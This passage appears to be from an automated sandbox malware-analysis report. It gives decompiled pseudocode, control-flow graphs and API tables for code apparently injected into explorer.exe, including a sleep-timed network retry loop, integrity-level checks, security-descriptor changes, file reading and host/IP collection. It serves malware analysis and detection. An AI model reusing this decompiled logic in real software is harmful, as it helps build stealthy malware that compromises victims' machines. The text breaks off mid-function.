    control_flow_graph 838 7c660c-7c6676 call 7c64bc call 7c1110 call 7c12b8 call 7c1308 847 7c667d-7c668b 838->847 848 7c6693-7c66a9 call 7c5ae8 847->848 849 7c668d-7c6691 847->849 854 7c66f0-7c66fb Sleep 848->854 855 7c66ab-7c66d0 call 7c5d20 848->855 849->848 850 7c66fd-7c6731 GetTickCount call 7c6340 call 7c1110 849->850 862 7c6787-7c678b 850->862 863 7c6733-7c677f call 7c1308 call 7c133c call 7c5d20 850->863 854->848 859 7c66d5-7c66dc 855->859 859->850 861 7c66de-7c66eb call 7c1440 859->861 874 7c68f6-7c68fc 861->874 865 7c678d-7c67aa call 7c1308 call 7c1440 862->865 866 7c67af-7c67c2 GetTickCount 862->866 885 7c6784 863->885 865->874 871 7c67d3-7c67df call 7c5468 866->871 872 7c67c4-7c67cd Sleep 866->872 880 7c67e1-7c67ec 871->880 881 7c682e-7c6839 871->881 872->871 880->881 884 7c67ee-7c67f9 Sleep call 7c5620 880->884 886 7c6855-7c6860 881->886 887 7c683b-7c683f 881->887 896 7c67fe-7c6806 884->896 885->862 891 7c6862-7c686d 886->891 892 7c6883-7c688e 886->892 889 7c6841-7c6848 887->889 890 7c684d-7c6850 887->890 897 7c68d6-7c68da 889->897 890->897 891->892 895 7c686f-7c6873 891->895 893 7c6890-7c689b 892->893 894 7c68b4-7c68bf 892->894 893->894 898 7c689d-7c68a4 893->898 894->897 903 7c68c1-7c68c8 894->903 899 7c6875-7c687c 895->899 900 7c687e-7c6881 895->900 896->881 901 7c6808 896->901 897->847 902 7c68e0-7c68f1 call 7c1308 897->902 904 7c68af-7c68b2 898->904 905 7c68a6-7c68ad 898->905 899->897 900->897 906 7c6815-7c682c call 7c5ae8 901->906 902->847 908 7c68ca-7c68d1 903->908 909 7c68d3 903->909 904->897 905->897 906->881 913 7c680a-7c680f Sleep 906->913 908->897 909->897 913->906
    C-Code - Quality: 95%
    			E007C660C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _v48;
				intOrPtr _v52;
				char _v181;
				char _v264;
				char _v329;
				char _v394;
				intOrPtr _t116;
				signed int _t117;
				intOrPtr _t123;
				signed int _t125;
				signed int _t131;
				signed int _t151;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t175;
				signed int _t177;
				intOrPtr _t195;
				void* _t201;
				void* _t202;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				E007C64BC( &_v264, 0x51, __eflags); // executed
				_v36 = E007C1110(_v12, E007C6900);
				_v40 = _v36 - _v12;
				E007C12B8( &_v329, _v40, _v12);
				 *((char*)(_t201 + _v40 - 0x145)) = 0;
				E007C1308( &_v394,  &_v329);
				_v44 = 1;
				L1:
				while(1) {
					if(_v44 % 0x32 == 0 || _v44 == 1) {
						L3:
						_t184 = _a8;
						_t116 =  *0x7ca194; // 0x7c1e9c, executed
						_t117 = E007C5AE8(_t116, _a8, 0); // executed
						_v24 = _t117;
						if(_v24 == 0) {
							Sleep(0x927c0);
							goto L3;
						}
						_t123 =  *0x7cc230; // 0x7c23ae
						_t125 = E007C5D20(_t184, _v8, _t123,  &_v264, _v12, _a8, 0, 0,  &_v28,  &_v32); // executed
						_v24 = _t125;
						if(_v24 == 0) {
							goto L7;
						} else {
							E007C1440(_v28);
							_v20 = 0;
							goto L39;
						}
					} else {
						L7:
						_v48 = GetTickCount();
						_t195 =  *0x7cc230; // 0x7c23ae
						E007C6340( &_v329, 0x94, _t195, __eflags);
						_v24 = 0;
						_t131 = E007C1110(_a4,  &_v329);
						__eflags = _t131;
						if(_t131 == 0) {
							E007C1308( &_v181,  &_v329);
							E007C133C( &_v181, _v36);
							_t202 = _t202 + 8;
							_t175 =  *0x7cc230; // 0x7c23ae
							_t177 = E007C5D20(0x94, _v8, _t175,  &_v264,  &_v181, _a8, 0, 0,  &_v28,  &_v32); // executed
							_v24 = _t177;
						}
						__eflags = _v24;
						if(_v24 == 0) {
							_v48 = GetTickCount() - _v48;
							__eflags = _v48 - 0x1388;
							if(_v48 < 0x1388) {
								__eflags = 0x1388;
								Sleep(0x1388 - _v48); // executed
							}
							_v52 = E007C5468();
							__eflags = _v44 - 5;
							if(_v44 != 5) {
								L19:
								__eflags = _v52 - _v16 - 0x3f480;
								if(_v52 - _v16 >= 0x3f480) {
									__eflags = _v52 - _v16 - 0x3f480;
									if(_v52 - _v16 <= 0x3f480) {
										L28:
										__eflags = _v52 - _v16 - 0x7e900;
										if(_v52 - _v16 <= 0x7e900) {
											L33:
											__eflags = _v52 - _v16 - 0xd2f00;
											if(_v52 - _v16 > 0xd2f00) {
												__eflags = _v44 - 0x12c;
												if(_v44 != 0x12c) {
													_t95 =  &_v44;
													 *_t95 = _v44 + 1;
													__eflags =  *_t95;
												} else {
													_v44 = 1;
												}
											}
											L37:
											__eflags = _v44 - 1;
											if(__eflags == 0) {
												E007C1308( &_v329,  &_v394);
											}
											continue;
										}
										__eflags = _v52 - _v16 - 0xd2f00;
										if(_v52 - _v16 >= 0xd2f00) {
											goto L33;
										}
										__eflags = _v44 - 0xc8;
										if(_v44 != 0xc8) {
											_v44 = _v44 + 1;
										} else {
											_v44 = 1;
										}
										goto L37;
									}
									__eflags = _v52 - _v16 - 0x7e900;
									if(_v52 - _v16 >= 0x7e900) {
										goto L28;
									}
									__eflags = _v44 - 0x64;
									if(_v44 != 0x64) {
										_v44 = _v44 + 1;
									} else {
										_v44 = 1;
									}
									goto L37;
								}
								__eflags = _v44 - 0x32;
								if(_v44 != 0x32) {
									_v44 = _v44 + 1;
								} else {
									_v44 = 1;
								}
								goto L37;
							} else {
								__eflags = _v52 - _a16 - 0x927c0;
								if(_v52 - _a16 >= 0x927c0) {
									goto L19;
								}
								Sleep(0x493e0); // executed
								_t151 = E007C5620(); // executed
								asm("sbb eax, eax");
								__eflags =  ~( ~_t151);
								if( ~( ~_t151) == 0) {
									while(1) {
										_t154 =  *0x7ca194; // 0x7c1e9c
										_t155 = E007C5AE8(_t154, _a8, 0);
										asm("sbb eax, eax");
										__eflags =  ~( ~_t155);
										if( ~( ~_t155) != 0) {
											goto L19;
										}
										Sleep(0x927c0);
									}
								}
								goto L19;
							}
						} else {
							E007C1308(_a12,  &_v181);
							E007C1440(_v28);
							_v20 = 0xffffffff;
							L39:
							return _v20;
						}
					}
				}
			}
































    0x007c6615
    0x007c6618
    0x007c661b
    0x007c6620
    0x007c662b
    0x007c663d
    0x007c6646
    0x007c6655
    0x007c665d
    0x007c6671
    0x007c6676
    0x00000000
    0x007c667d
    0x007c668b
    0x007c6693
    0x007c6693
    0x007c6698
    0x007c669d
    0x007c66a2
    0x007c66a9
    0x007c66f5
    0x00000000
    0x007c66f5
    0x007c66c6
    0x007c66d0
    0x007c66d5
    0x007c66dc
    0x00000000
    0x007c66de
    0x007c66e1
    0x007c66e8
    0x00000000
    0x007c66e8
    0x007c66fd
    0x007c66fd
    0x007c6703
    0x007c6711
    0x007c6717
    0x007c671e
    0x007c672a
    0x007c672f
    0x007c6731
    0x007c673f
    0x007c674f
    0x007c6754
    0x007c6775
    0x007c677f
    0x007c6784
    0x007c6784
    0x007c6787
    0x007c678b
    0x007c67b8
    0x007c67bb
    0x007c67c2
    0x007c67c9
    0x007c67cd
    0x007c67cd
    0x007c67d8
    0x007c67db
    0x007c67df
    0x007c682e
    0x007c6834
    0x007c6839
    0x007c685b
    0x007c6860
    0x007c6883
    0x007c6889
    0x007c688e
    0x007c68b4
    0x007c68ba
    0x007c68bf
    0x007c68c1
    0x007c68c8
    0x007c68d3
    0x007c68d3
    0x007c68d3
    0x007c68ca
    0x007c68ca
    0x007c68ca
    0x007c68c8
    0x007c68d6
    0x007c68d6
    0x007c68da
    0x007c68ec
    0x007c68ec
    0x00000000
    0x007c68da
    0x007c6896
    0x007c689b
    0x00000000
    0x00000000
    0x007c689d
    0x007c68a4
    0x007c68af
    0x007c68a6
    0x007c68a6
    0x007c68a6
    0x00000000
    0x007c68a4
    0x007c6868
    0x007c686d
    0x00000000
    0x00000000
    0x007c686f
    0x007c6873
    0x007c687e
    0x007c6875
    0x007c6875
    0x007c6875
    0x00000000
    0x007c6873
    0x007c683b
    0x007c683f
    0x007c684d
    0x007c6841
    0x007c6841
    0x007c6841
    0x00000000
    0x007c67e1
    0x007c67e7
    0x007c67ec
    0x00000000
    0x00000000
    0x007c67f3
    0x007c67f9
    0x007c6800
    0x007c6804
    0x007c6806
    0x007c6815
    0x007c681a
    0x007c681f
    0x007c6826
    0x007c682a
    0x007c682c
    0x00000000
    0x00000000
    0x007c680f
    0x007c680f
    0x007c6815
    0x00000000
    0x007c6806
    0x007c678d
    0x007c6796
    0x007c679e
    0x007c67a3
    0x007c68f6
    0x007c68fc
    0x007c68fc
    0x007c678b
    0x007c668b

    APIs
      • Part of subcall function 007C64BC: GetVersionExA.KERNEL32(0000009C), ref: 007C6530
    • Sleep.KERNEL32(000927C0), ref: 007C66F5
    • GetTickCount.KERNEL32 ref: 007C66FD
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • GetTickCount.KERNEL32 ref: 007C67AF
    • Sleep.KERNELBASE(00001388), ref: 007C67CD
      • Part of subcall function 007C5468: GetSystemTime.KERNEL32(?), ref: 007C5472
    • Sleep.KERNELBASE(000493E0), ref: 007C67F3
    • Sleep.KERNEL32(000927C0), ref: 007C680F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8AA4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59windowthreadregistry

    Control-flow Graph

    C-Code - Quality: 91%
    			E007C8AA4(void* __edx, void* __eflags) {
				struct _WNDCLASSEXA _v52;
				struct tagMSG _v80;
				char _v97;
				void* _t14;
				struct HWND__* _t26;

				E007C1164(E007C10B4(E007C1164(E007C10B4(_t14, __edx),  &_v97),  &_v97),  &(( &_v97)[8]));
				E007C1258( &_v52, 0x30);
				_v52.cbSize = 0x30;
				_v52.hInstance = 0;
				_v52.lpszClassName =  &_v97;
				_v52.lpfnWndProc = E007C8A48;
				RegisterClassExA( &_v52);
				_t26 = CreateWindowExA(0,  &_v97, 0, 0, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, 0, 0); // executed
				 *0x7ca574 = _t26;
				if( *0x7ca574 != 0) {
					while(GetMessageA( &_v80, 0, 0, 0) != 0) {
						TranslateMessage( &_v80);
						DispatchMessageA( &_v80);
					}
				}
				_push(0);
				return RtlExitUserThread();
			}








    0x007c8ac2
    0x007c8acf
    0x007c8ad4
    0x007c8add
    0x007c8ae3
    0x007c8ae6
    0x007c8af1
    0x007c8b1d
    0x007c8b23
    0x007c8b2f
    0x007c8b47
    0x007c8b37
    0x007c8b41
    0x007c8b41
    0x007c8b47
    0x007c8b5b
    0x007c8b66

    APIs
    • RegisterClassExA.USER32(00000030), ref: 007C8AF1
    • CreateWindowExA.USER32(00000000,?,00000000,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C8B1D
    • TranslateMessage.USER32(?), ref: 007C8B37
    • DispatchMessageA.USER32(?), ref: 007C8B41
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 007C8B51
    • RtlExitUserThread.NTDLL(00000000), ref: 007C8B5D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C42D4, Relevance: 10.6, APIs: 7, Instructions: 101

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 929 7c42d4-7c42fa OpenProcessToken 930 7c43f9-7c4405 929->930 931 7c4300-7c431c GetTokenInformation 929->931 932 7c4322-7c432b GetLastError 931->932 933 7c43ef-7c43f3 CloseHandle 931->933 932->933 934 7c4331-7c4340 call 7c13dc 932->934 933->930 934->933 937 7c4346-7c4366 GetTokenInformation 934->937 938 7c4368-7c437b GetSidSubAuthorityCount 937->938 939 7c43e7-7c43ea call 7c1440 937->939 938->939 940 7c437d-7c4383 938->940 939->933 940->939 942 7c4385-7c43a0 GetSidSubAuthority 940->942 942->939 943 7c43a2-7c43b1 942->943 944 7c43bc-7c43c3 943->944 945 7c43b3-7c43ba 943->945 946 7c43d7-7c43de 944->946 947 7c43c5-7c43cc 944->947 945->939 946->939 949 7c43e0 946->949 947->946 948 7c43ce-7c43d5 947->948 948->939 949->939
    C-Code - Quality: 88%
    			E007C42D4(void* __eax) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				void** _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr* _v40;
				signed int _t40;
				signed int _t47;
				signed int _t59;

				_v8 = __eax;
				_v16 = 0;
				_t40 = OpenProcessToken(_v8, 8,  &_v20);
				asm("sbb eax, eax");
				if( ~( ~_t40) == 0) {
					L17:
					_v12 = _v16;
					return _v12;
				}
				_t47 = GetTokenInformation(_v20, 0x19, 0, 0,  &_v24); // executed
				asm("sbb eax, eax");
				if( ~( ~_t47) != 0 || GetLastError() != 0x7a) {
					L16:
					CloseHandle(_v20);
					goto L17;
				} else {
					_v28 = E007C13DC(_v24);
					if(_v28 == 0) {
						goto L16;
					}
					_t59 = GetTokenInformation(_v20, 0x19, _v28, _v24,  &_v24); // executed
					asm("sbb eax, eax");
					if( ~( ~_t59) != 0) {
						_v36 = GetSidSubAuthorityCount( *_v28);
						if(_v36 != 0 &&  *_v36 > 0) {
							_v40 = GetSidSubAuthority( *_v28, ( *_v36 & 0x000000ff) - 1);
							if(_v40 != 0) {
								_v32 =  *_v40;
								if(_v32 >= 0x2000) {
									if(_v32 < 0x2000 || _v32 >= 0x3000) {
										if(_v32 >= 0x3000) {
											_v16 = 3;
										}
									} else {
										_v16 = 2;
									}
								} else {
									_v16 = 1;
								}
							}
						}
					}
					E007C1440(_v28);
					goto L16;
				}
			}















    0x007c42da
    0x007c42df
    0x007c42ec
    0x007c42f4
    0x007c42fa
    0x007c43f9
    0x007c43fc
    0x007c4405
    0x007c4405
    0x007c430e
    0x007c4316
    0x007c431c
    0x007c43ef
    0x007c43f3
    0x00000000
    0x007c4331
    0x007c4339
    0x007c4340
    0x00000000
    0x00000000
    0x007c4358
    0x007c4360
    0x007c4366
    0x007c4374
    0x007c437b
    0x007c4399
    0x007c43a0
    0x007c43a7
    0x007c43b1
    0x007c43c3
    0x007c43de
    0x007c43e0
    0x007c43e0
    0x007c43ce
    0x007c43ce
    0x007c43ce
    0x007c43b3
    0x007c43b3
    0x007c43b3
    0x007c43b1
    0x007c43a0
    0x007c437b
    0x007c43ea
    0x00000000
    0x007c43ea

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007C42EC
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007C430E
    • GetLastError.KERNEL32 ref: 007C4322
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 007C4358
    • GetSidSubAuthorityCount.ADVAPI32(?), ref: 007C436E
    • GetSidSubAuthority.ADVAPI32(?,?), ref: 007C4393
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • CloseHandle.KERNEL32(?), ref: 007C43F3
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C4408, Relevance: 9.1, APIs: 6, Instructions: 85

    Control-flow Graph

    C-Code - Quality: 64%
    			E007C4408(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
				intOrPtr* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				struct _ACL* _v16;
				void* _v20;
				int _v24;
				int _v28;
				struct _ACL* _v32;
				intOrPtr _t37;
				signed int _t38;
				signed int _t50;
				signed int _t59;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
					_t37 =  *0x7ca0d4; // 0x7c1cb4
					_t38 =  *0x7cb32c(_t37, 1,  &_v20, 0); // executed
					asm("sbb eax, eax");
					if( ~( ~_t38) == 0) {
						_v20 = 0xffffffff;
					} else {
						_v32 = 0;
						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
						asm("sbb eax, eax");
						if( ~( ~_t50) == 0) {
							L5:
							LocalFree(_v20);
							_v20 = 0xffffffff;
						} else {
							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
							asm("sbb eax, eax");
							if( ~( ~_t59) == 0) {
								goto L5;
							}
						}
					}
					if(_v8 != 0) {
						 *_v8 = 0xc;
						 *(_v8 + 4) = _v12;
						 *((intOrPtr*)(_v8 + 8)) = 0;
					}
					_v16 = _v20;
				}
				return _v16;
			}














    0x007c440e
    0x007c4411
    0x007c4416
    0x007c4427
    0x007c444d
    0x007c4453
    0x007c445b
    0x007c4461
    0x007c44bb
    0x007c4463
    0x007c4465
    0x007c4478
    0x007c4480
    0x007c4486
    0x007c44a8
    0x007c44ac
    0x007c44b2
    0x007c4488
    0x007c4498
    0x007c44a0
    0x007c44a6
    0x00000000
    0x00000000
    0x007c44a6
    0x007c4486
    0x007c44c6
    0x007c44cb
    0x007c44d7
    0x007c44df
    0x007c44df
    0x007c44e5
    0x007c44e5
    0x007c44ee

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 007C441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 007C4437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(007C1CB4,00000001,?,00000000), ref: 007C4453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4498
    • LocalFree.KERNEL32(?), ref: 007C44AC
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C4406, Relevance: 9.1, APIs: 6, Instructions: 85

    Control-flow Graph

    C-Code - Quality: 64%
    			E007C4406(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
				intOrPtr* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				struct _ACL* _v16;
				void* _v20;
				int _v24;
				int _v28;
				struct _ACL* _v32;
				intOrPtr _t37;
				signed int _t38;
				signed int _t50;
				signed int _t59;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
					_t37 =  *0x7ca0d4; // 0x7c1cb4
					_t38 =  *0x7cb32c(_t37, 1,  &_v20, 0); // executed
					asm("sbb eax, eax");
					if( ~( ~_t38) == 0) {
						_v20 = 0xffffffff;
					} else {
						_v32 = 0;
						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
						asm("sbb eax, eax");
						if( ~( ~_t50) == 0) {
							L6:
							LocalFree(_v20);
							_v20 = 0xffffffff;
						} else {
							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
							asm("sbb eax, eax");
							if( ~( ~_t59) == 0) {
								goto L6;
							}
						}
					}
					if(_v8 != 0) {
						 *_v8 = 0xc;
						 *(_v8 + 4) = _v12;
						 *((intOrPtr*)(_v8 + 8)) = 0;
					}
					_v16 = _v20;
				}
				return _v16;
			}














    0x007c440e
    0x007c4411
    0x007c4416
    0x007c4427
    0x007c444d
    0x007c4453
    0x007c445b
    0x007c4461
    0x007c44bb
    0x007c4463
    0x007c4465
    0x007c4478
    0x007c4480
    0x007c4486
    0x007c44a8
    0x007c44ac
    0x007c44b2
    0x007c4488
    0x007c4498
    0x007c44a0
    0x007c44a6
    0x00000000
    0x00000000
    0x007c44a6
    0x007c4486
    0x007c44c6
    0x007c44cb
    0x007c44d7
    0x007c44df
    0x007c44df
    0x007c44e5
    0x007c44e5
    0x007c44ee

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 007C441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 007C4437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(007C1CB4,00000001,?,00000000), ref: 007C4453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4498
    • LocalFree.KERNEL32(?), ref: 007C44AC
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C7A44, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 120

    Control-flow Graph

    C-Code - Quality: 94%
    			E007C7A44(void* __ecx) {
				int _v8;
				int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v1053;
				char _v1074;
				int _t44;
				int _t51;
				void* _t91;

				_t91 = __ecx;
				_v8 = 0;
				 *0x7cb00c = 0;
				GetModuleFileNameA(0,  &_v1053, 0x401);
				E007C48DC( &_v1053, _t91, 0x7cb00c);
				_t44 = GetFileVersionInfoSizeA( &_v1053,  &_v12); // executed
				_v12 = _t44;
				if(_v12 != 0) {
					_v16 = E007C13DC(_v12);
					_t51 = GetFileVersionInfoA( &_v1053, _v8, _v12, _v16); // executed
					if(_t51 != 0) {
						_v24 = 0x34;
						 *0x7cb298(_v16, E007C7BFC,  &_v20,  &_v24);
						_v28 = _v20;
						E007C133C("explorer 10.0.10586.104", 0x7c7c00);
						E007C1864(E007C1884( *(_v28 + 0x10)) & 0x0000ffff,  &_v1074);
						E007C133C("explorer 10.0.10586.104",  &_v1074);
						E007C133C("explorer 10.0.10586.104", 0x7c7c04);
						E007C1864( *(_v28 + 0x10) & 0x0000ffff,  &_v1074);
						E007C133C("explorer 10.0.10586.104",  &_v1074);
						E007C133C("explorer 10.0.10586.104", 0x7c7c04);
						E007C1864(E007C1884( *(_v28 + 0x14)) & 0x0000ffff,  &_v1074);
						E007C133C("explorer 10.0.10586.104",  &_v1074);
						E007C133C("explorer 10.0.10586.104", 0x7c7c04);
						E007C1864( *(_v28 + 0x14) & 0x0000ffff,  &_v1074);
						E007C133C("explorer 10.0.10586.104",  &_v1074);
					}
					return E007C1440(_v16);
				}
				return _t44;
			}














    0x007c7a44
    0x007c7a4f
    0x007c7a52
    0x007c7a67
    0x007c7a78
    0x007c7a88
    0x007c7a8e
    0x007c7a95
    0x007c7aa3
    0x007c7ab9
    0x007c7ac1
    0x007c7ac7
    0x007c7adf
    0x007c7ae8
    0x007c7af5
    0x007c7b13
    0x007c7b27
    0x007c7b39
    0x007c7b50
    0x007c7b64
    0x007c7b76
    0x007c7b94
    0x007c7ba8
    0x007c7bba
    0x007c7bd1
    0x007c7be5
    0x007c7bea
    0x00000000
    0x007c7bf0
    0x007c7bf8

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 007C7A67
    • GetFileVersionInfoSizeA.KERNELBASE(?,?), ref: 007C7A88
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • GetFileVersionInfoA.KERNELBASE(?,?,00000000,?), ref: 007C7AB9
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
      • Part of subcall function 007C1864: wsprintfA.USER32 ref: 007C1874
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C47AC, Relevance: 7.6, APIs: 5, Instructions: 64file

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1058 7c47ac-7c47e6 CreateFileA 1059 7c4804-7c4808 1058->1059 1060 7c47e8-7c4801 CreateFileA 1058->1060 1061 7c4855-7c485b 1059->1061 1062 7c480a-7c481d GetFileSize 1059->1062 1060->1059 1062->1061 1063 7c481f-7c4852 call 7c13b4 ReadFile CloseHandle 1062->1063 1063->1061
    C-Code - Quality: 100%
    			E007C47AC(CHAR* __eax, void** __edx) {
				CHAR* _v8;
				void** _v12;
				long _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _t27;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0xffffffff;
				 *_v12 = 0;
				_t27 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v20 = _t27;
				if(_v20 == 0xffffffff) {
					_v20 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v20 != 0xffffffff) {
					_v24 = GetFileSize(_v20, 0);
					if(_v24 != 0) {
						E007C13B4(_v12, _v24 + 1); // executed
						ReadFile(_v20,  *_v12, _v24,  &_v28, 0); // executed
						CloseHandle(_v20);
						_v16 = _v24;
					}
				}
				return _v16;
			}










    0x007c47b2
    0x007c47b5
    0x007c47b8
    0x007c47c4
    0x007c47d9
    0x007c47df
    0x007c47e6
    0x007c4801
    0x007c4801
    0x007c4808
    0x007c4816
    0x007c481d
    0x007c4826
    0x007c483f
    0x007c4849
    0x007c4852
    0x007c4852
    0x007c481d
    0x007c485b

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C47D9
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C47FB
    • GetFileSize.KERNEL32(?,00000000), ref: 007C4810
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007C483F
    • CloseHandle.KERNEL32(?), ref: 007C4849
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8258, Relevance: 7.6, APIs: 5, Instructions: 50network

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1066 7c8258-7c8299 WSAStartup gethostname gethostbyname 1067 7c82ef-7c82f2 1066->1067 1068 7c829b-7c82a9 1066->1068 1069 7c82dd-7c82e7 1068->1069 1070 7c82ab-7c82da inet_ntoa call 7c133c * 2 1069->1070 1071 7c82e9 WSACleanup 1069->1071 1070->1069 1071->1067
    C-Code - Quality: 28%
    			E007C8258(char* __eax) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v84;
				char _v484;
				intOrPtr _t31;
				void* _t46;

				_v8 = __eax;
				 *_v8 = 0;
				 *0x7cb3c0(0x101,  &_v484);
				gethostname( &_v84, 0x40); // executed
				_t31 =  *0x7cb3e0( &_v84); // executed
				_v12 = _t31;
				if(_v12 != 0) {
					_v16 =  *((intOrPtr*)(_v12 + 0xc));
					_v20 = 0;
					while( *((intOrPtr*)(_v16 + _v20 * 4)) != 0) {
						E007C133C(_v8,  *0x7cb344( *((intOrPtr*)( *((intOrPtr*)(_v16 + _v20 * 4))))));
						E007C133C(_v8, E007C82F4);
						_t46 = _t46 + 0x10;
						_v20 = _v20 + 1;
					}
					return  *0x7cb3d8();
				}
				return _t31;
			}











    0x007c8261
    0x007c8267
    0x007c8276
    0x007c8282
    0x007c828c
    0x007c8292
    0x007c8299
    0x007c82a1
    0x007c82a6
    0x007c82dd
    0x007c82c1
    0x007c82d2
    0x007c82d7
    0x007c82da
    0x007c82da
    0x00000000
    0x007c82e9
    0x007c82f2

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C4BA0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176registry
    C-Code - Quality: 100%
    			E007C4BA0(intOrPtr* __eax) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v36;
